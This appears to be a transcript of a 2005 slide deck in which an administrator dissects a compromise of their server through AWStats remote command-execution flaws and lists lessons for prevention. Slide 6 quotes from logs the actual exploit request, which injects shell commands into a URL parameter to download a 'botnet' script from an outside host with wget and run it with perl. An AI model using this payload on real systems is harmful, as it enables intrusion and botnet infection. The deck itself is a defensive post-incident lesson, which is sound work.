The Anatomy of a Hack - PowerPoint PPT Presentation

1 / 8
About This Presentation
Title:

The Anatomy of a Hack

Description:

2005-02-25: AWStats Plugin Multiple Remote Command Execution Vulnerabilities ... Valuable reminder Don't get complacent. 8. How I could have prevented it ... – PowerPoint PPT presentation

Number of Views:101
Avg rating:3.0/5.0
Slides: 9
Provided by: til42
Category:

less

Transcript and Presenter's Notes

Title: The Anatomy of a Hack


1
The Anatomy of a Hack
March 2005
2
The vulnerabilities.
  • 2005-02-25  AWStats Plugin Multiple Remote
    Command Execution Vulnerabilities  
  • 2005-02-16  AWStats Logfile Parameter Remote
    Command Execution Vulnerability  
  • 2005-02-16  AWStats Rawlog Plugin Logfile
    Parameter Input Validation Vulnerability  
  • 2005-02-16  AWStats Remote Command Execution
    Vulnerability  
  • 2005-02-14  AWStats Debug Remote Information
    Disclosure Vulnerability  
  • 2005-01-15  AWStats Multiple Unspecified Remote
    Input Validation Vulnerabilities

3
AWStats Multiple Unspecified Remote Input
Validation Vulnerabilities (15 Jan)
  • Multiple unspecified remote input validation
    vulnerabilities affect AWStats. These issues are
    due to a failure of the application to perform
    proper validation on user-supplied input prior to
    using it to carry out some critical function.
  • Although unconfirmed an attacker may leverage
    these issues to execute commands and disclose
    sensitive information with the privileges of the
    underlying Web server.

4
AWStats Remote Command Execution Vulnerability
(16 Feb)
  • AWStats is reported prone to a remote arbitrary
    command execution vulnerability. This issue
    presents itself due to insufficient sanitization
    of user-supplied data.
  • An attacker can prefix arbitrary commands with
    the '' character and have them executed in the
    context of the server through a URI parameter.

5
The First Probe
  • 05/Mar/2005012955 -0600 "GET
    //cgi-bin/awstats/awstats.pl?configdir20id20
    HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible
    MSIE 6.0 Windows 98)"

6
The Exploit
  • 13/Mar/2005191712 -0600 "POST
    /cgi-bin/awstats.pl?configdirecho20echo20kil
    lall2020perlcd20/tmpwget20ssh.a.la/botnetpe
    rl20botnetrm20botnetecho20echo HTTP/1.0"
    200 414 "-" "Mozilla/4.0 (compatible MSIE 6.0b
    Windows NT 5.0)"

7
Results of Exploits
  • Left lots of litter in /tmp
  • Opened up multiple listeners (est. 6)
  • Most were botnet daemons or backdoors
  • Clean up has been fun and educational
  • No damage to the system just had my ego dinged up
    a little
  • Valuable reminder Dont get complacent

8
How I could have prevented it
  • Stay on top of vulnerabilities
  • They are always shortly followed by exploits
  • Patch/Upgrade as soon as possible
  • Review logs and check your file systems
  • I.e. /tmp would have been and easy tip-off
  • Know what listeners are running and check them
    regularly
Write a Comment
User Comments (0)
About PowerShow.com